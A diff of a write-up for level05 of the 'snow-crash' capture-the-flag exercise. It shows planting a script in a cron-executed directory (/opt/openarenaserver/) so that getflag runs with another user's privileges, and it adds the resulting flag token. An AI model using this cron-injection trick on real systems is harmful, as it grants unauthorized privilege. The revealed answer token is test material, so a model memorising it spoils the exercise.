adbenoit-9/42_snow-crash/level05/Ressources/solution.md

 done
 ```

-## step 3 : run getflag with /usr/sbin/openarenaserver
+## step 4 : run getflag with /usr/sbin/openarenaserver
  - Put a script to get the output of getflag in the folder /opt/openarenaserver/
 ```
 $ echo 'getflag > /tmp/flag.out' > /opt/openarenaserver/test.sh
 ```

-- wait for cron to run the script
+- wait max 2minutes for cron to run the script

 - read the output
 ```
 $ cat /tmp/flag.out
+Check flag.Here is your token : viuaaale9huek52boumoomioc
 ```